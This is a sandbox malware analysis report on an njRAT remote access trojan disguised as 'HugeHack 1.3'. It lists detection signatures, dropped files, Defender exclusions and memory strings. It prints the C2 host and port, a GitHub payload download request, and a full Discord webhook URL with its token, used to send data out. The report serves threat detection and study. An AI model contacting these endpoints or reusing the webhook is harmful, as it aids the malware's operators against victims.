Windows Analysis Report
HugeHack 1.3.exe.bin.exe

Overview

General Information

Sample name:	HugeHack 1.3.exe.bin.exe
Analysis ID:	1645836
MD5:	a6d81f76e32d232302d5d3e088cbeb16
SHA1:	345f29473e735735a4ad9e63e668f7eb89ce843c
SHA256:	107c0d57d568c7f5e3cce08d6915098a12b1703c75e454ae4600c976dadd8aa8
Tags:	exeuser-TornadoAV_dev
Infos:

Detection

Njrat

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious encrypted Powershell command line found

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Njrat

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

Adds a directory exclusion to Windows Defender

Adds extensions / path to Windows Defender exclusion list (Registry)

Contains functionality to log keystrokes (.Net Source)

Creates autostart registry keys with suspicious names

Disables zone checking for all users

Drops PE files to the startup folder

Encrypted powershell cmdline option found

Loading BitLocker PowerShell Module

Protects its processes via BreakOnTermination flag

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Potentially Suspicious Malware Callback Communication

Sigma detected: PowerShell Base64 Encoded Invoke Keyword

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: System File Execution Location Anomaly

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to detect virtual machines (SLDT)

Contains functionality to query CPU information (cpuid)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Dllhost Internet Connection

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Sigma detected: Windows Defender Exclusions Added - Registry

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Stores files to the Windows start menu directory

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
NjRAT	RedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives."It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.	AQUATIC PANDA Earth Lusca Operation C-Major The Gorgon Group	http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/ http://blogs.360.cn/post/analysis-of-apt-c-37.html http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/ https://asec.ahnlab.com/1369	https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: HugeHack 1.3.exe.bin.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe	Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\ClickMe.exe	Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Avira: detection malicious, Label: TR/Spy.Gen8

Found malware configuration

Source: 2.0.Payload.exe.890000.0.unpack

Malware Configuration Extractor: Njrat {"Host": "gabh.gotdns.ch", "Port": "7777", "Version": "<- NjRAT 0.7d Horror Edition ->", "Registry Name": "c382eb151c59bd833b24120723eac541", "Campaign ID": "User", "Network Seprator": "Y262SUCZ4UJJ"}

Multi AV Scanner detection for dropped file

Source: C:\ClickMe.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\dllhost.exe	ReversingLabs: Detection: 81%

Multi AV Scanner detection for submitted file

Source: HugeHack 1.3.exe.bin.exe	Virustotal: Detection: 76%			Perma Link
Source: HugeHack 1.3.exe.bin.exe	ReversingLabs: Detection: 91%

Yara detected Njrat

Source: Yara match	File source: HugeHack 1.3.exe.bin.exe, type: SAMPLE
Source: Yara match	File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1216428944.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3698298941.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HugeHack 1.3.exe.bin.exe PID: 7552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Payload.exe PID: 7616, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED
Source: Yara match	File source: C:\ClickMe.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED

Uses 32bit PE files

Source: HugeHack 1.3.exe.bin.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Users\user\AppData\Local\Temp\Payload.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.113.4:443 -> 192.168.2.4:49729 version: TLS 1.2

Source:

Binary string: C:\Users\Daniel\program.pdb source: HugeHack 1.3.exe.bin.exe, 00000000.00000003.1224675944.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, webhook.exe, 00000003.00000000.1224355173.0000000000632000.00000002.00000001.01000000.00000008.sdmp

Change of critical system settings

Adds extensions / path to Windows Defender exclusion list (Registry)

Source: C:\Windows\SysWOW64\reg.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths C:\

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h		3_2_07F9B248
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h		3_2_07F9B244

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.4:49732 -> 46.121.250.34:7777
Source: Network traffic	Suricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.4:49732 -> 46.121.250.34:7777
Source: Network traffic	Suricata IDS: 2838486 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi Variant CnC Activity (inf) : 192.168.2.4:49732 -> 46.121.250.34:7777
Source: Network traffic	Suricata IDS: 2825566 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (CAP) : 192.168.2.4:49732 -> 46.121.250.34:7777

System process connects to network (likely due to code injection or exploit)

Source: C:\Users\user\AppData\Roaming\dllhost.exe

Network Connect: 46.121.250.34 7777

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49732 -> 46.121.250.34:7777

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1352684770521387070/EnDdIPnq1Toz0toXGIhTo1T09Jq8MMJhXvjTWp5MjXqBLpdpS9QoPUThjc3XSnogFIz9 HTTP/1.1Content-Type: application/jsonHost: discordapp.comContent-Length: 77Expect: 100-continueConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 140.82.113.4 140.82.113.4
Source: Joe Sandbox View	IP Address: 162.159.130.233 162.159.130.233
Source: Joe Sandbox View	IP Address: 162.159.130.233 162.159.130.233
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

May check the online IP address of the machine

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49726 -> 172.67.74.152:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49729 -> 140.82.113.4:443

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /AnonAm0369/am/raw/refs/heads/main/RuntimeBroker.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET /AnonAm0369/am/raw/refs/heads/main/RuntimeBroker.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: discordapp.com
Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: gabh.gotdns.ch

Source: unknown

HTTP traffic detected: POST /api/webhooks/1352684770521387070/EnDdIPnq1Toz0toXGIhTo1T09Jq8MMJhXvjTWp5MjXqBLpdpS9QoPUThjc3XSnogFIz9 HTTP/1.1Content-Type: application/jsonHost: discordapp.comContent-Length: 77Expect: 100-continueConnection: Keep-Alive

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Sat, 22 Mar 2025 16:34:45 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin

Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/U3
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/allow-java-encodings
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/allow-java-encodingsler
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/continue-after-fatal-error
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/continue-after-fatal-errorLastChi=
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/create-cdata-nodes
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/create-cdata-nodes:
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/disallow-doctype-decl
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/disallow-doctype-decln
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/disallow-doctype-declna
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/create-entity-ref-nodes
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion9
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespace
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespace/
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotations
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotationsme
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocations
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocationsNodeVal;
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/include-comments
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/parser-settings
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/parser-settings7
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicates
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicatesling
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-only
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-onlyy/
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/namespace-growth
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/namespace-growthh
Source: javaw.exe, javaw.exe, 00000005.00000003.1360100051.000000001528E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3302081083.0000000015294000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1355684652.0000000015204000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3698035742.0000000015292000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1558573934.0000000015294000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358921734.000000001525E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1510520893.0000000015294000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/namespaces
Source: javaw.exe, 00000005.00000003.1360100051.000000001528E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3302081083.0000000015294000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1355684652.0000000015204000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3698035742.0000000015292000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1558573934.0000000015294000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358921734.000000001525E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1510520893.0000000015294000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/namespacesA
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtd
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtdte:
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refs
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refsf-node7
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refst3
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/standard-uri-conformant
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validate-annotations
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validate-annotationsce
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-trees
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-treeskN1
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/dynamic
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/dynamicrnal/im
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/id-idref-checking
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/id-idref-checking/xml/F
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/identity-constraint-checking
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/identity-constraint-checkingum
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema-full-checking
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema-full-checkingor=
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psvi
